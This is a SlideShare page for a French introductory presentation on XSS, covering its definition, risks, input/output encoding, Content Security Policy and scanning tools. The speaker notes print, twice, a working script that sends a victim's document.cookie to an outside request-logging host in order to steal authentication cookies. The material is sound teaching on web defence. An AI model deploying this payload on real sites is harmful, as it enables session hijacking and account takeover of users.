SlideShare une entreprise Scribd logo
1  sur  12
Introduction XSS
Plan
1. Qu’est ce qu’une faille XSS ?
1. Définition
2. Risques
3. Types de XSS
2. Contremesures
1. Input filtering/Output encoding
2. CSP
3. Outils de détection
Qu’est ce qu’une faille XSS ?
Définition
 Exécution de code client malicieux depuis un site web légitime par le navigateur web de la victime
Qu’est ce qu’une faille XSS ?
OWASP
 Classée numéro 3 du TOP 10
Prévalence Très répandue
Détection Facile
Impact Modérée
Qu’est ce qu’une faille XSS ?
Risques
 Vol de cookie d’authentification
 Porte d’entrée pour les injections CSRF
 Redirection des utilisateurs vers un site de phishing
 Attaque sur le système (exemple : scan)
Qu’est ce qu’une faille XSS ?
Exemple
 Site avec listing des avis client
 Objectif : Voler les cookies d’authentification des utilisateurs pour s’authentifier à leur place
 Script :
Qu’est ce qu’une faille XSS ?
Démonstration
Démo
Contremesures
Input filtering / Output encoding
Input
Valider toutes les entrées faites par les utilisateurs
 Mécanismes intégrés (ASP.NET : AllowHTML, ValidateInput())
 Filtrage des caractères potentiellement dangereux (Server.HtmlEncode())
Output
 Mécanismes intégrés (ASP.NET Razor, {{{myVar}}} Handlebars)
 Filtrage des caractères potentiellement dangereux (Server.HtmlEncode())
Contremesures
CSP (Content Security Policy)
 Headers HTTP renvoyés par le serveur
 Contrôle la provenance des ressources téléchargées par le navigateur du client
 Images, script, appel AJAX, CSS, iFrame, etc.)
 Interdit par défaut l’exécution des scripts inline (<script></script>)
 Exemple :
Content-Security-Policy: default-src 'self'; script-src 'self'
https://cdn.google.com; style-src 'self' https://cdn.google.com;
img-src https://images.monsite.com;
Outils de détection (analyse dynamique)
 Gratuits
 Arachni
 ZAP
 XSSer
 Payants
 Acunetix
 Burp
 CheckMarkx
 Veracode
Exemple Arachni
Démo
Questions
?

Contenu connexe

Tendances

Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Sylvain Maret
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1Tarek MOHAMED
 
Les attaques par injection sql
Les attaques par injection sqlLes attaques par injection sql
Les attaques par injection sqlMohamed Yassin
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatiqueSaber Ferjani
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité webdavystoffel
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Ritesh Gupta
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeMarie Tapia
 

Tendances (20)

Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2Introduction à La Sécurité Informatique 1/2
Introduction à La Sécurité Informatique 1/2
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Sécurité des Applications WEB -LEVEL1
 Sécurité des Applications WEB-LEVEL1 Sécurité des Applications WEB-LEVEL1
Sécurité des Applications WEB -LEVEL1
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Les attaques par injection sql
Les attaques par injection sqlLes attaques par injection sql
Les attaques par injection sql
 
La sécurité informatique
La sécurité informatiqueLa sécurité informatique
La sécurité informatique
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Comprendre la securite web
Comprendre la securite webComprendre la securite web
Comprendre la securite web
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Introduction vulnérabilité web
Introduction vulnérabilité webIntroduction vulnérabilité web
Introduction vulnérabilité web
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Les attaques
Les attaquesLes attaques
Les attaques
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Webinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme ThéméeWebinaire : sécurité informatique sur le web - Jérôme Thémée
Webinaire : sécurité informatique sur le web - Jérôme Thémée
 

Similaire à Introduction XSS

Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Wixiweb
 
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeConférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeNormandie Web Xperts
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques InformatiquesSylvain Maret
 
Présentation ransomware - Ivanti Interchange 2017
Présentation ransomware - Ivanti Interchange 2017Présentation ransomware - Ivanti Interchange 2017
Présentation ransomware - Ivanti Interchange 2017Bastien Bobe
 
Owasp top 10 2010 Resist toulouse
Owasp top 10   2010  Resist toulouseOwasp top 10   2010  Resist toulouse
Owasp top 10 2010 Resist toulouseSébastien GIORIA
 
Rapport Threat Intelligence Check Point du 8 août 2016
Rapport Threat Intelligence Check Point du 8 août 2016Rapport Threat Intelligence Check Point du 8 août 2016
Rapport Threat Intelligence Check Point du 8 août 2016Blandine Delaporte
 
Rapport Threat Intelligence Check Point du 5 décembre 2016
Rapport Threat Intelligence Check Point du 5 décembre 2016Rapport Threat Intelligence Check Point du 5 décembre 2016
Rapport Threat Intelligence Check Point du 5 décembre 2016Blandine Delaporte
 
Rapport Threat Intelligence Check Point du 25 juillet 2016
Rapport Threat Intelligence Check Point du 25 juillet 2016Rapport Threat Intelligence Check Point du 25 juillet 2016
Rapport Threat Intelligence Check Point du 25 juillet 2016Blandine Delaporte
 

Similaire à Introduction XSS (14)

Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]
 
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime MauchausséeConférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
Conférence #nwxtech2 : Sécurité web/PHP par Maxime Mauchaussée
 
Attaques Informatiques
Attaques InformatiquesAttaques Informatiques
Attaques Informatiques
 
Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)Sécurité des Applications Web avec Json Web Token (JWT)
Sécurité des Applications Web avec Json Web Token (JWT)
 
Présentation ransomware - Ivanti Interchange 2017
Présentation ransomware - Ivanti Interchange 2017Présentation ransomware - Ivanti Interchange 2017
Présentation ransomware - Ivanti Interchange 2017
 
Sécuriter informatiques
Sécuriter informatiquesSécuriter informatiques
Sécuriter informatiques
 
Sécuriser un cms
Sécuriser un cms Sécuriser un cms
Sécuriser un cms
 
Owasp top 10 2010 Resist toulouse
Owasp top 10   2010  Resist toulouseOwasp top 10   2010  Resist toulouse
Owasp top 10 2010 Resist toulouse
 
Rapport Threat Intelligence Check Point du 8 août 2016
Rapport Threat Intelligence Check Point du 8 août 2016Rapport Threat Intelligence Check Point du 8 août 2016
Rapport Threat Intelligence Check Point du 8 août 2016
 
Securité web
Securité webSecurité web
Securité web
 
Securite web is_ima
Securite web is_imaSecurite web is_ima
Securite web is_ima
 
Rapport Threat Intelligence Check Point du 5 décembre 2016
Rapport Threat Intelligence Check Point du 5 décembre 2016Rapport Threat Intelligence Check Point du 5 décembre 2016
Rapport Threat Intelligence Check Point du 5 décembre 2016
 
Les malwares
Les malwaresLes malwares
Les malwares
 
Rapport Threat Intelligence Check Point du 25 juillet 2016
Rapport Threat Intelligence Check Point du 25 juillet 2016Rapport Threat Intelligence Check Point du 25 juillet 2016
Rapport Threat Intelligence Check Point du 25 juillet 2016
 

Introduction XSS

  • 2. Plan 1. Qu’est ce qu’une faille XSS ? 1. Définition 2. Risques 3. Types de XSS 2. Contremesures 1. Input filtering/Output encoding 2. CSP 3. Outils de détection
  • 3. Qu’est ce qu’une faille XSS ? Définition  Exécution de code client malicieux depuis un site web légitime par le navigateur web de la victime
  • 4. Qu’est ce qu’une faille XSS ? OWASP  Classée numéro 3 du TOP 10 Prévalence Très répandue Détection Facile Impact Modérée
  • 5. Qu’est ce qu’une faille XSS ? Risques  Vol de cookie d’authentification  Porte d’entrée pour les injections CSRF  Redirection des utilisateurs vers un site de phishing  Attaque sur le système (exemple : scan)
  • 6. Qu’est ce qu’une faille XSS ? Exemple  Site avec listing des avis client  Objectif : Voler les cookies d’authentification des utilisateurs pour s’authentifier à leur place  Script :
  • 7. Qu’est ce qu’une faille XSS ? Démonstration Démo
  • 8. Contremesures Input filtering / Output encoding Input Valider toutes les entrées faites par les utilisateurs  Mécanismes intégrés (ASP.NET : AllowHTML, ValidateInput())  Filtrage des caractères potentiellement dangereux (Server.HtmlEncode()) Output  Mécanismes intégrés (ASP.NET Razor, {{{myVar}}} Handlebars)  Filtrage des caractères potentiellement dangereux (Server.HtmlEncode())
  • 9. Contremesures CSP (Content Security Policy)  Headers HTTP renvoyés par le serveur  Contrôle la provenance des ressources téléchargées par le navigateur du client  Images, script, appel AJAX, CSS, iFrame, etc.)  Interdit par défaut l’exécution des scripts inline (<script></script>)  Exemple : Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.google.com; style-src 'self' https://cdn.google.com; img-src https://images.monsite.com;
  • 10. Outils de détection (analyse dynamique)  Gratuits  Arachni  ZAP  XSSer  Payants  Acunetix  Burp  CheckMarkx  Veracode

Notes de l'éditeur

  1. Type : Stockée Réfléchie DOM based
  2. Prévalence : Se produit quand l’application web inclue dans une page des données saisies par un utilisateur (commentaire, article de blog, Twitter, etc.) Détection : Outils automatiques de détection Impact : Exécution de scripts sur le navigateur de la victime Deface de site web Redirection (Phishing)
  3. <script> var req = new XMLHttpRequest(); req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true); req.send(null); </script>
  4. <script> var req = new XMLHttpRequest(); req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true); req.send(null); </script>